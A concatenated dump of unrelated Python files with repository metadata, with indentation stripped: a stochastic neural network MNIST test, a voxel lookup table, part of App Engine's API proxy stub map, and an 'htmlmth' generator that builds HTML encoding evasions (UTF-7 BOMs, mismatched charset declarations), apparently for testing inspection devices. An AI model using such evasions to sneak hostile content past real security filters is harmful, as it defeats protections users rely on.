from snn.utils import HOUtils
# misc functions
def createSN(x, length):
"""create bipolar SN by comparing random vector elementwise to SN value x"""
# rand = np.random.rand(length)*2.0 - 1.0
# x_SN = np.less(rand, x)
large = np.random.rand(1)
x_SN = np.full(length, False)
if large:
for i in range(int(np.ceil(((x+1)/2)*length))):
x_SN[i] = True
else:
for i in range(int(np.floor(((x+1)/2)*length))):
x_SN[i] = True
np.random.shuffle(x_SN)
return x_SN
def stochtoint(x):
"""convert bipolar stochastic number to integer"""
return (sum(x)/len(x))*2.0 - 1.0
def first_layer_activation(x):
return K.tanh(x*0.7)
# 2 = 1 input layer x 1x1 filter + 1 bias
#return K.tanh(x/2)
#return K.relu(x/2)
def second_layer_activation(x):
return K.tanh(x*0.7)
# 2 = 1 input layers x 1x1 filter + 1 bias
#return K.tanh(x/2)
#return K.relu(x/2)
get_custom_objects().update({'first_layer_activation': Activation(first_layer_activation)})
get_custom_objects().update({'second_layer_activation': Activation(second_layer_activation)})
np.set_printoptions(threshold=np.inf)
batch_size = 128
num_last_classes = 10
epochs = 2
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
x_train = x_train[:60000]
x_test = x_test[:800]
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_last_classes)
y_test = keras.utils.to_categorical(y_test, num_last_classes)
y_train = y_train[:60000]
y_test = y_test[:800]
print(y_train.shape)
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
# Binary NN for reference
model = Sequential()
model.add(Conv2D(2, kernel_size=(4, 4),
input_shape=input_shape, use_bias=False)) # with APC
model.add(Activation('first_layer_activation')) # tanh(x/2) activation
model.add(Conv2D(3, kernel_size=(4, 4), use_bias=False)) # with APC
model.add(Activation('second_layer_activation')) # tanh(x/2) activation
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(100)) # with APC
model.add(Activation('relu'))
model.add(Dense(num_last_classes)) # with APC
model.add(Activation('softmax'))
model.compile(loss=keras.losses.mse,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
#model.fit(x_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# verbose=0,
# callbacks=[WeightScaling_large.WeightScale()],
# validation_data=(x_test, y_test))
#model.save_weights('v6.4_test_result_IntensiveTests_16.h5')
model.load_weights('v6.4_test_result_IntensiveTests_16.h5')
score = model.evaluate(x_test[:500], y_test[:500], verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
score = model.evaluate(x_test[:107], y_test[:107], verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
#layer1model = Model(inputs=model.input, outputs=model.get_layer(index=1).output)
layer2model = Model(inputs=model.input, outputs=model.get_layer(index=2).output)
#layer3model = Model(inputs=model.input, outputs=model.get_layer(index=3).output)
layer4model = Model(inputs=model.input, outputs=model.get_layer(index=4).output)
layer5model = Model(inputs=model.input, outputs=model.get_layer(index=5).output)
#layer6model = Model(inputs=model.input, outputs=model.get_layer(index=6).output)
layer7model = Model(inputs=model.input, outputs=model.get_layer(index=7).output)
layer8model = Model(inputs=model.input, outputs=model.get_layer(index=8).output)
layer9model = Model(inputs=model.input, outputs=model.get_layer(index=9).output)
#layer10model = Model(inputs=model.input, outputs=model.get_layer(index=10).output)
# Hybrid NN with stochastic convolutional layer and binary dense layer
# SN length
length = 1024*4
#length = 1024*4
ut = HOUtils()
# weights and biases of the convolutional layer
#bias_1_SNs = ut.GetConvolutionLayerBiasesSN(model, 1, length)
#weight_1_SNs = ut.GetConvolutionLayerWeightsSN(model, 1, length)
weight_1_SNs, bias_1_SNs, listIndex1 = ut.GetConvolutionLayerWeightsBiasesSN(model, 1, length, Adaptive="False")
#bias_3_SNs = ut.GetConvolutionLayerBiasesSN(model, 3, length)
#weight_3_SNs = ut.GetConvolutionLayerWeightsSN(model, 3, length)
weight_3_SNs, bias_3_SNs, listIndex3 = ut.GetConvolutionLayerWeightsBiasesSN(model, 3, length, Adaptive="False")
dense_7_biases = ut.GetConnectedLayerBiases(model, 7)
dense_7_weight_SNs = ut.GetConnectedLayerWeightsSN(model, 7, length)
#Currently, it cannot perform the 2nd dense layer with the stochastic numbers due to the range of 1st dense layer results
dense_9_biases = ut.GetConnectedLayerBiases(model, 9)
dense_9_weights = ut.GetConnectedLayerWeights(model, 9)
#SN_input_matrix = np.full((img_rows, img_cols, length), False)
output = np.zeros((1, 10))
correct_predictions = 0
test_index = 0
output_mse = 0
print('start stochastic NN')
# for each input in the test set
for r in range(10):
x = x_test[test_index]
print(test_index)
# build input SN matrix
SN_input_matrix = np.full((img_rows, img_cols, length), False)
for i in range(img_rows):
for j in range(img_cols):
SN_input_matrix[i, j] = createSN(x[0, i, j], length)
del(x)
print('inputs generated')
# Generate the HOModel
hoModel = HOModel(SN_input_matrix)
del(SN_input_matrix)
# convolutional layer 1
hoModel.SetNumOutputPlanes(2) # The number of slices:2
hoModel.SetWeights(weight_1_SNs)
hoModel.SetZeroBias(2)
hoModel.SetListIndex(listIndex1)
hoConvLayer = HOConvolution(4, 4, length, baseMode="APC", activationFunc="BTanh", use_bias="False")
hoModel.Activation(hoConvLayer, stride=1)
del(hoConvLayer)
print('conv layer 1 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_conv1', test_index,
hoModel.GetOutputMatrix(), 2, 25, 25,
layer2model, x_test)
print(str(test_index + 1) + ' conv 1 layer results saved in txt format')
# convolutional layer 2
hoModel.SetNumOutputPlanes(3) # The number of slices:3
hoModel.SetWeights(weight_3_SNs)
hoModel.SetZeroBias(3)
hoModel.SetListIndex(listIndex3)
hoConvLayer = HOConvolution(4, 4, length, baseMode="APC", activationFunc="BTanh", use_bias="False")
hoModel.Activation(hoConvLayer, stride=1)
del(hoConvLayer)
print('conv layer 2 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_conv2', test_index,
hoModel.GetOutputMatrix(), 3, 22, 22,
layer4model, x_test)
print(str(test_index + 1) + ' conv 2 layer results saved in txt format')
# max pooling layer
hoMaxLayer = HOMaxPoolingExact(2, 2, length)
hoModel.Activation(hoMaxLayer, stride=2) # Stride:2, filterSize:2x2
del(hoMaxLayer)
print('max pool 1 done')
ut.SaveInTxtFormat('v8.0_intensive_snn_tests16_maxpool', test_index,
hoModel.GetOutputMatrix(), 3, 11, 11,
layer5model, x_test)
print(str(test_index+1)+' maxpool layer results saved in txt format')
# First dense layer
hoModel.SetNumOutputPlanes(1) # The number of slices:1
hoModel.SetDenseWeights(dense_7_weight_SNs)
hoModel.SetDenseBias(dense_7_biases)
hoDenseLayer = HOConnected(length, stochToInt="APC", activationFunc="Relu", use_bias="True")
hoModel.Activation(hoDenseLayer, num_classes=100)
del(hoDenseLayer)
################### For debugging purpose, save the intermidiate results in the local variable ###################
dense_output = hoModel.GetOutputMatrix()
print("dense 1 output from Binary NN")
BNN_prediction = layer8model.predict(np.asarray([x_test[test_index]]))
print(BNN_prediction)
del(BNN_prediction)
print("dense 1 output from Stochastic NN")
print(dense_output)
###################################################################################################################
print('dense 1 layer done')
# Second dense layer
dense_output = hoModel.GetOutputMatrix()
dense_output = ut.BinaryConnectedLAyer(100, num_last_classes, dense_output, dense_9_weights, dense_9_biases)
################### For debugging purpose, save the intermidiate results in the local variable ###################
print("dense 2 output from Binary NN")
BNN_prediction = layer9model.predict(np.asarray([x_test[test_index]]))
print(BNN_prediction)
del(BNN_prediction)
print("dense 2 output from Stochastic NN")
print(dense_output)
###################################################################################################################
print('dense 2 layer done')
out_error = 0
out = layer9model.predict(np.asarray([x_test[test_index]]))
for i in range(10):
out_error = out_error + (dense_output[0, i] - out[0, i])**2
print("out_error:", out_error)
output_mse = output_mse + out_error
# softmax activation
dense_out_exp = [np.exp(i) for i in dense_output]
exp_sum_out = np.sum(dense_out_exp)
hybrid_output = [i/exp_sum_out for i in dense_out_exp]
print('dense 2 done with the softmax activation function')
print("Keras Prediction of max argument of dense layer")
print(np.argmax(y_test[test_index]))
print("SNN results of dense layer")
print(np.argmax(hybrid_output))
if(np.argmax(hybrid_output) == np.argmax(y_test[test_index])):
correct_predictions = correct_predictions + 1
test_index = test_index + 1
current_accuracy = correct_predictions/test_index
print('current_accuracy')
print(current_accuracy)
del(dense_output)
del(hoModel)
correct_predictions = correct_predictions/10
print("correct classifications:", correct_predictions)
output_mse = output_mse/10
print("output_mse:", output_mse) | [
"yjod22@naver.com"
] | yjod22@naver.com |
b943ead1eacea576c10699349c9f96e7cc928967 | 2a53f6b341fad4c317d05d2302ce9243a028869c | /htmlmth/evasions/html/generate_encodings_py.py | 7ea90438e5798fd96b128fa6cff80849349a4e5b | [
"MIT"
] | permissive | OldSecureIQLab/htmlmth | 2cc5472f1086fed5d7e57b3e03446afe12a2e116 | 74d23ca2fa53e11b2587251d2f71c8f275548182 | refs/heads/main | 2023-08-11T15:48:57.838412 | 2021-09-15T17:13:40 | 2021-09-15T17:13:40 | 336,342,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,366 | py | # Too lazy to create evasions/html/encodings.py by hand
document = ""
document += """from . import TransformFunction, string_to_tfarg_function, mime_type_based_transform, normalized_headers_to_tfarg_function
import htmlmth.mods.http
import htmlmth.mods.html
# This file was generated by generate_encodings_py.py"
"""
# (name of function in custom_encodings.py , name of encoding to place in descriptions)
all_encodings = [
("utf_8", "UTF-8"),
("utf_16_be", "UTF-16BE"),
("utf_16_le", "UTF-16LE"),
("utf_7_0", "UTF-7 variant 0"),
("utf_7_1", "UTF-7 variant 1"),
("utf_7_2", "UTF-7 variant 2"),
("utf_7_3", "UTF-7 variant 3"),
("utf_7_4", "UTF-7 variant 4"),
("utf_7_5", "UTF-7 variant 5"),
("utf_7_5_i", "UTF-7 variant 5i"),
]
all_encoding_declarations = [
"utf-8",
"utf-16",
"utf-16be",
"utf-16le",
"utf-7",
]
all_bom = [
("\xef\xbb\xbf", "utf-8"),
# ("", "utf-16"),
("\xfe\xff", "utf-16be"),
("\xff\xfe", "utf-16le"),
# ("", "utf-7 (variant 0)"), # TODO: the correct variant that'll result in variants 1 OR 2 OR 3 OR 4 & not result in the first character being a random unicode char
("\x2b\x2f\x76\x38", "utf-7 (variant 1)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
("\x2b\x2f\x76\x39", "utf-7 (variant 2)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
("\x2b\x2f\x76\x2b", "utf-7 (variant 3)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
("\x2b\x2f\x76\x2f", "utf-7 (variant 4)"), # messes up the encoding of the first char since the 4th byte of the BOM is dependent on the first char
("\x2b\x2f\x76\x38\x2d", "utf-7 (variant 5)"),
]
all_mime_types = [
"text/html",
"application/xhtml+xml",
"application/xml",
"text/xml",
"text/javascript",
"text/vbscript"
]
##### NO DECLARED ENCODING #####
description_template = "No encoding declared ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
# soft assumption that no BOM present
no_declared_encoding_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}))
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
for e in all_encodings:
description = description_template.format(e[1])
func1_dict = ""
for m in all_mime_types:
func1_dict += func1_dict_template.format(m, e[0])
evasion = evasion_template.format(e[0], description, func1_dict)
document += evasion + "\n"
##### DECLARE ENCODING IN HTTP HEADER #####
description_template = "declared as {} in http headers ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that no BOM present
http_declared_{4}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}))
"""
func1_dict_template = " '{0}': normalized_headers_to_tfarg_function(lambda x: htmlmth.mods.http.declare_encoding('{1}', x)),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
for e in all_encodings:
for ed in all_encoding_declarations:
description = description_template.format(ed, e[1])
func1_dict = ""
func2_dict = ""
for m in all_mime_types:
func1_dict += func1_dict_template.format(m, ed)
for m in all_mime_types:
func2_dict += func2_dict_template.format(m, e[0])
evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, ed.replace('-', '_'))
document += evasion + "\n"
##### DECLARE ENCODING WITH BOM #####
description_template = "{} BOM ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
bom_declared_{4}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}))
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: {1} + str(x)),\n"
for e in all_encodings:
for bom in all_bom:
description = description_template.format(bom[1], e[1])
func1_dict = ""
func2_dict = ""
for m in all_mime_types:
func1_dict += func1_dict_template.format(m, e[0])
for m in all_mime_types:
func2_dict += func2_dict_template.format(m, repr(bom[0]))
evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, bom[1].replace('-', '_').replace(" ", "_").replace("(", "").replace(")", ""))
document += evasion + "\n"
##### DECLARE ENCODING IN HTTP HEADER AND WITH BOM #####
description_template = "declared as {} in http headers ;{} BOM ;sent encoded as {}"
evasion_template = """# soft assumption that no encoding declared in the document
# soft assumption that encoding has not been declared in HTTP headers
# soft assumption that no BOM present
http_declared_{6}_bom_declared_{5}_encoded_as_{0} = TransformFunction("",
"{1}",
mime_type_based_transform({{
{2} }}),
mime_type_based_transform({{
{3} }}),
mime_type_based_transform({{
{4} }})
)
"""
func1_dict_template = " '{0}': string_to_tfarg_function(lambda x: htmlmth.mods.html.{1}(x.encode('utf-8'))),\n"
func2_dict_template = " '{0}': string_to_tfarg_function(lambda x: {1} + str(x)),\n"
func3_dict_template = " '{0}': normalized_headers_to_tfarg_function(lambda x: htmlmth.mods.http.declare_encoding('{1}', x)),\n"
for e in all_encodings:
for ed in all_encoding_declarations:
for bom in all_bom:
description = description_template.format(ed, bom[1], e[1])
func1_dict = ""
func2_dict = ""
func3_dict = ""
for m in all_mime_types:
func1_dict += func1_dict_template.format(m, e[0])
for m in all_mime_types:
func2_dict += func2_dict_template.format(m, repr(bom[0]))
for m in all_mime_types:
func3_dict += func3_dict_template.format(m, ed)
evasion = evasion_template.format(e[0], description, func1_dict, func2_dict, func3_dict, bom[1].replace('-', '_').replace(" ", "_").replace("(", "").replace(")", ""), ed.replace('-', '_'))
document += evasion + "\n"
##### DECLARE ENCODING IN DOCUMENT #####
# TODO:
print(document)
with open("encodings.py", "w") as f:
f.write(document)
| [
"CreatePhotonW@gmail.com"
] | CreatePhotonW@gmail.com |
b2d73bf7801bce94f947af621d2658b3dbbd6969 | 0b980e227018f631579e20187e60d7140e301eaf | /canstick2.py | 2323717881ad16a8731c05d281457a0facd6a51e | [] | no_license | saleelpk95/3D-Thinning | 91854ad04ca9e066e0caaa0daee9bceab4a7f605 | 197152089d29c983545f72807178185069cd1bb3 | refs/heads/master | 2021-01-15T20:09:47.397326 | 2017-11-22T19:42:59 | 2017-11-22T19:42:59 | 99,848,810 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,261 | py | widthGrid = 7
heightGrid = 1
depthGrid = 7
lookup = [ # 80 entries
{ 'x': 2, 'y': 0, 'z': 0 }, # layer 0 ( voxel 0 )
{ 'x': 3, 'y': 0, 'z': 0 }, # layer 0 ( voxel 1 )
{ 'x': 4, 'y': 0, 'z': 0 }, # layer 0 ( voxel 2 )
{ 'x': 5, 'y': 0, 'z': 0 }, # layer 0 ( voxel 3 )
{ 'x': 2, 'y': 0, 'z': 1 }, # layer 0 ( voxel 4 )
{ 'x': 3, 'y': 0, 'z': 1 }, # layer 0 ( voxel 5 )
{ 'x': 4, 'y': 0, 'z': 1 }, # layer 0 ( voxel 6 )
{ 'x': 5, 'y': 0, 'z': 1 }, # layer 0 ( voxel 7 )
{ 'x': 0, 'y': 0, 'z': 2 }, # layer 0 ( voxel 8 )
{ 'x': 1, 'y': 0, 'z': 2 }, # layer 0 ( voxel 9 )
{ 'x': 2, 'y': 0, 'z': 2 }, # layer 0 ( voxel 10 )
{ 'x': 3, 'y': 0, 'z': 2 }, # layer 0 ( voxel 11 )
{ 'x': 4, 'y': 0, 'z': 2 }, # layer 0 ( voxel 12 )
{ 'x': 5, 'y': 0, 'z': 2 }, # layer 0 ( voxel 13 )
{ 'x': 6, 'y': 0, 'z': 2 }, # layer 0 ( voxel 14 )
{ 'x': 7, 'y': 0, 'z': 2 }, # layer 0 ( voxel 15 )
{ 'x': 0, 'y': 0, 'z': 3 }, # layer 0 ( voxel 16 )
{ 'x': 1, 'y': 0, 'z': 3 }, # layer 0 ( voxel 17 )
{ 'x': 2, 'y': 0, 'z': 3 }, # layer 0 ( voxel 18 )
{ 'x': 3, 'y': 0, 'z': 3 }, # layer 0 ( voxel 19 )
{ 'x': 4, 'y': 0, 'z': 3 }, # layer 0 ( voxel 20 )
{ 'x': 5, 'y': 0, 'z': 3 }, # layer 0 ( voxel 21 )
{ 'x': 6, 'y': 0, 'z': 3 }, # layer 0 ( voxel 22 )
{ 'x': 7, 'y': 0, 'z': 3 }, # layer 0 ( voxel 23 )
{ 'x': 0, 'y': 0, 'z': 4 }, # layer 0 ( voxel 24 )
{ 'x': 1, 'y': 0, 'z': 4 }, # layer 0 ( voxel 25 )
{ 'x': 2, 'y': 0, 'z': 4 }, # layer 0 ( voxel 26 )
{ 'x': 3, 'y': 0, 'z': 4 }, # layer 0 ( voxel 27 )
{ 'x': 4, 'y': 0, 'z': 4 }, # layer 0 ( voxel 28 )
{ 'x': 5, 'y': 0, 'z': 4 }, # layer 0 ( voxel 29 )
{ 'x': 6, 'y': 0, 'z': 4 }, # layer 0 ( voxel 30 )
{ 'x': 7, 'y': 0, 'z': 4 }, # layer 0 ( voxel 31 )
{ 'x': 0, 'y': 0, 'z': 5 }, # layer 0 ( voxel 32 )
{ 'x': 1, 'y': 0, 'z': 5 }, # layer 0 ( voxel 33 )
{ 'x': 2, 'y': 0, 'z': 5 }, # layer 0 ( voxel 34 )
{ 'x': 3, 'y': 0, 'z': 5 }, # layer 0 ( voxel 35 )
{ 'x': 4, 'y': 0, 'z': 5 }, # layer 0 ( voxel 36 )
{ 'x': 5, 'y': 0, 'z': 5 }, # layer 0 ( voxel 37 )
{ 'x': 6, 'y': 0, 'z': 5 }, # layer 0 ( voxel 38 )
{ 'x': 7, 'y': 0, 'z': 5 }, # layer 0 ( voxel 39 )
{ 'x': 2, 'y': 0, 'z': 6 }, # layer 0 ( voxel 40 )
{ 'x': 3, 'y': 0, 'z': 6 }, # layer 0 ( voxel 41 )
{ 'x': 4, 'y': 0, 'z': 6 }, # layer 0 ( voxel 42 )
{ 'x': 5, 'y': 0, 'z': 6 }, # layer 0 ( voxel 43 )
{ 'x': 2, 'y': 0, 'z': 7 }, # layer 0 ( voxel 44 )
{ 'x': 3, 'y': 0, 'z': 7 }, # layer 0 ( voxel 45 )
{ 'x': 4, 'y': 0, 'z': 7 }, # layer 0 ( voxel 46 )
{ 'x': 5, 'y': 0, 'z': 7 }, # layer 0 ( voxel 47 )
{ 'x': 2, 'y': 1, 'z': 0 }, # layer 1 ( voxel 48 )
{ 'x': 3, 'y': 1, 'z': 0 }, # layer 1 ( voxel 49 )
{ 'x': 4, 'y': 1, 'z': 0 }, # layer 1 ( voxel 50 )
{ 'x': 5, 'y': 1, 'z': 0 }, # layer 1 ( voxel 51 )
{ 'x': 2, 'y': 1, 'z': 1 }, # layer 1 ( voxel 52 )
{ 'x': 3, 'y': 1, 'z': 1 }, # layer 1 ( voxel 53 )
{ 'x': 4, 'y': 1, 'z': 1 }, # layer 1 ( voxel 54 )
{ 'x': 5, 'y': 1, 'z': 1 }, # layer 1 ( voxel 55 )
{ 'x': 0, 'y': 1, 'z': 2 }, # layer 1 ( voxel 56 )
{ 'x': 1, 'y': 1, 'z': 2 }, # layer 1 ( voxel 57 )
{ 'x': 6, 'y': 1, 'z': 2 }, # layer 1 ( voxel 58 )
{ 'x': 7, 'y': 1, 'z': 2 }, # layer 1 ( voxel 59 )
{ 'x': 0, 'y': 1, 'z': 3 }, # layer 1 ( voxel 60 )
{ 'x': 1, 'y': 1, 'z': 3 }, # layer 1 ( voxel 61 )
{ 'x': 6, 'y': 1, 'z': 3 }, # layer 1 ( voxel 62 )
{ 'x': 7, 'y': 1, 'z': 3 }, # layer 1 ( voxel 63 )
{ 'x': 0, 'y': 1, 'z': 4 }, # layer 1 ( voxel 64 )
{ 'x': 1, 'y': 1, 'z': 4 }, # layer 1 ( voxel 65 )
{ 'x': 6, 'y': 1, 'z': 4 }, # layer 1 ( voxel 66 )
{ 'x': 7, 'y': 1, 'z': 4 }, # layer 1 ( voxel 67 )
{ 'x': 0, 'y': 1, 'z': 5 }, # layer 1 ( voxel 68 )
{ 'x': 1, 'y': 1, 'z': 5 }, # layer 1 ( voxel 69 )
{ 'x': 6, 'y': 1, 'z': 5 }, # layer 1 ( voxel 70 )
{ 'x': 7, 'y': 1, 'z': 5 }, # layer 1 ( voxel 71 )
{ 'x': 2, 'y': 1, 'z': 6 }, # layer 1 ( voxel 72 )
{ 'x': 3, 'y': 1, 'z': 6 }, # layer 1 ( voxel 73 )
{ 'x': 4, 'y': 1, 'z': 6 }, # layer 1 ( voxel 74 )
{ 'x': 5, 'y': 1, 'z': 6 }, # layer 1 ( voxel 75 )
{ 'x': 2, 'y': 1, 'z': 7 }, # layer 1 ( voxel 76 )
{ 'x': 3, 'y': 1, 'z': 7 }, # layer 1 ( voxel 77 )
{ 'x': 4, 'y': 1, 'z': 7 }, # layer 1 ( voxel 78 )
{ 'x': 5, 'y': 1, 'z': 7 } # layer 1 ( voxel 79 )
]
| [
"saleelpk95@gmail.com"
] | saleelpk95@gmail.com |
b5603b0c427e91c8e8c47439c7e4f5c9e0981c81 | 57cd8d92675227a16f54c6cf3fe2a7266221364b | /google-blog-converters-r79/lib/googleappengine/python/google/appengine/api/apiproxy_stub_map.py | 716498f8344a2ec50b288fe5e79e7b360509d2d3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | hylom/pyblosxom2wp | 7265cb39cacccffb7fd333f545b76953502f9c92 | fa500acb2b7be96d9371958970be55eddbd7fc3c | refs/heads/master | 2016-09-05T20:15:27.197969 | 2009-12-01T16:55:29 | 2009-12-01T16:55:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,264 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Container of APIProxy stubs for more convenient unittesting.
Classes/variables/functions defined here:
APIProxyStubMap: container of APIProxy stubs.
apiproxy: global instance of an APIProxyStubMap.
MakeSyncCall: APIProxy entry point.
UserRPC: User-visible class wrapping asynchronous RPCs.
"""
import inspect
import sys
from google.appengine.api import apiproxy_rpc
def CreateRPC(service):
"""Creates a RPC instance for the given service.
The instance is suitable for talking to remote services.
Each RPC instance can be used only once, and should not be reused.
Args:
service: string representing which service to call.
Returns:
the rpc object.
Raises:
AssertionError or RuntimeError if the stub for service doesn't supply a
CreateRPC method.
"""
stub = apiproxy.GetStub(service)
assert stub, 'No api proxy found for service "%s"' % service
assert hasattr(stub, 'CreateRPC'), ('The service "%s" doesn\'t have ' +
'a CreateRPC method.' % service)
return stub.CreateRPC()
def MakeSyncCall(service, call, request, response):
"""The APIProxy entry point for a synchronous API call.
Args:
service: string representing which service to call
call: string representing which function to call
request: protocol buffer for the request
response: protocol buffer for the response
Raises:
apiproxy_errors.Error or a subclass.
"""
apiproxy.MakeSyncCall(service, call, request, response)
class ListOfHooks(object):
"""An ordered collection of hooks for a particular API call.
A hook is a function that has exactly the same signature as
a service stub. It will be called before or after an api hook is
executed, depending on whether this list is for precall of postcall hooks.
Hooks can be used for debugging purposes (check certain
pre- or postconditions on api calls) or to apply patches to protocol
buffers before/after a call gets submitted.
"""
def __init__(self):
"""Constructor."""
self.__content = []
self.__unique_keys = set()
def __len__(self):
"""Returns the amount of elements in the collection."""
return self.__content.__len__()
def __Insert(self, index, key, function, service=None):
"""Appends a hook at a certain position in the list.
Args:
index: the index of where to insert the function
key: a unique key (within the module) for this particular function.
If something from the same module with the same key is already
registered, nothing will be added.
function: the hook to be added.
service: optional argument that restricts the hook to a particular api
Returns:
True if the collection was modified.
"""
unique_key = (key, inspect.getmodule(function))
if unique_key in self.__unique_keys:
return False
num_args = len(inspect.getargspec(function)[0])
if (inspect.ismethod(function)):
num_args -= 1
self.__content.insert(index, (key, function, service, num_args))
self.__unique_keys.add(unique_key)
return True
def Append(self, key, function, service=None):
"""Appends a hook at the end of the list.
Args:
key: a unique key (within the module) for this particular function.
If something from the same module with the same key is already
registered, nothing will be added.
function: the hook to be added.
service: optional argument that restricts the hook to a particular api
Returns:
True if the collection was modified.
"""
return self.__Insert(len(self), key, function, service)
def Push(self, key, function, service=None):
"""Inserts a hook at the beginning of the list.
Args:
key: a unique key (within the module) for this particular function.
If something from the same module with the same key is already
registered, nothing will be added.
function: the hook to be added.
service: optional argument that restricts the hook to a particular api
Returns:
True if the collection was modified.
"""
return self.__Insert(0, key, function, service)
def Clear(self):
"""Removes all hooks from the list (useful for unit tests)."""
self.__content = []
self.__unique_keys = set()
def Call(self, service, call, request, response, rpc=None):
"""Invokes all hooks in this collection.
Args:
service: string representing which service to call
call: string representing which function to call
request: protocol buffer for the request
response: protocol buffer for the response
rpc: optional RPC used to make this call
"""
for key, function, srv, num_args in self.__content:
if srv is None or srv == service:
if num_args == 5:
function(service, call, request, response, rpc)
else:
function(service, call, request, response)
class APIProxyStubMap(object):
"""Container of APIProxy stubs for more convenient unittesting.
Stubs may be either trivial implementations of APIProxy services (e.g.
DatastoreFileStub, UserServiceStub) or "real" implementations.
For unittests, we may want to mix and match real and trivial implementations
of services in order to better focus testing on individual service
implementations. To achieve this, we allow the client to attach stubs to
service names, as well as define a default stub to be used if no specific
matching stub is identified.
"""
def __init__(self, default_stub=None):
"""Constructor.
Args:
default_stub: optional stub
'default_stub' will be used whenever no specific matching stub is found.
"""
self.__stub_map = {}
self.__default_stub = default_stub
self.__precall_hooks = ListOfHooks()
self.__postcall_hooks = ListOfHooks()
def GetPreCallHooks(self):
"""Gets a collection for all precall hooks."""
return self.__precall_hooks
def GetPostCallHooks(self):
"""Gets a collection for all precall hooks."""
return self.__postcall_hooks
def RegisterStub(self, service, stub):
"""Register the provided stub for the specified service.
Args:
service: string
stub: stub
"""
assert not self.__stub_map.has_key(service), repr(service)
self.__stub_map[service] = stub
if service == 'datastore':
self.RegisterStub('datastore_v3', stub)
def GetStub(self, service):
"""Retrieve the stub registered for the specified service.
Args:
service: string
Returns:
stub
Returns the stub registered for 'service', and returns the default stub
if no such stub is found.
"""
return self.__stub_map.get(service, self.__default_stub)
def MakeSyncCall(self, service, call, request, response):
"""The APIProxy entry point.
Args:
service: string representing which service to call
call: string representing which function to call
request: protocol buffer for the request
response: protocol buffer for the response
Raises:
apiproxy_errors.Error or a subclass.
"""
stub = self.GetStub(service)
assert stub, 'No api proxy found for service "%s"' % service
if hasattr(stub, 'CreateRPC'):
rpc = stub.CreateRPC()
self.__precall_hooks.Call(service, call, request, response, rpc)
rpc.MakeCall(service, call, request, response)
rpc.Wait()
rpc.CheckSuccess()
self.__postcall_hooks.Call(service, call, request, response, rpc)
else:
self.__precall_hooks.Call(service, call, request, response)
stub.MakeSyncCall(service, call, request, response)
self.__postcall_hooks.Call(service, call, request, response)
class UserRPC(object):
"""Wrapper class for asynchronous RPC.
Simplest low-level usage pattern:
rpc = UserRPC('service', [deadline], [callback])
rpc.make_call('method', request, response)
.
.
.
rpc.wait()
rpc.check_success()
However, a service module normally provides a wrapper so that the
typical usage pattern becomes more like this:
from google.appengine.api import service
rpc = service.create_rpc([deadline], [callback])
service.make_method_call(rpc, [service-specific-args])
.
.
.
rpc.wait()
result = rpc.get_result()
The service.make_method_call() function sets a service- and method-
specific hook function that is called by rpc.get_result() with the
rpc object as its first argument, and service-specific value as its
second argument. The hook function should call rpc.check_success()
and then extract the user-level result from the rpc.result
protobuffer. Additional arguments may be passed from
make_method_call() to the get_result hook via the second argument.
"""
__method = None
__get_result_hook = None
__user_data = None
__postcall_hooks_called = False
def __init__(self, service, deadline=None, callback=None):
"""Constructor.
Args:
service: The service name.
deadline: Optional deadline. Default depends on the implementation.
callback: Optional argument-less callback function.
"""
self.__service = service
self.__rpc = CreateRPC(service)
self.__rpc.deadline = deadline
self.__rpc.callback = callback
@property
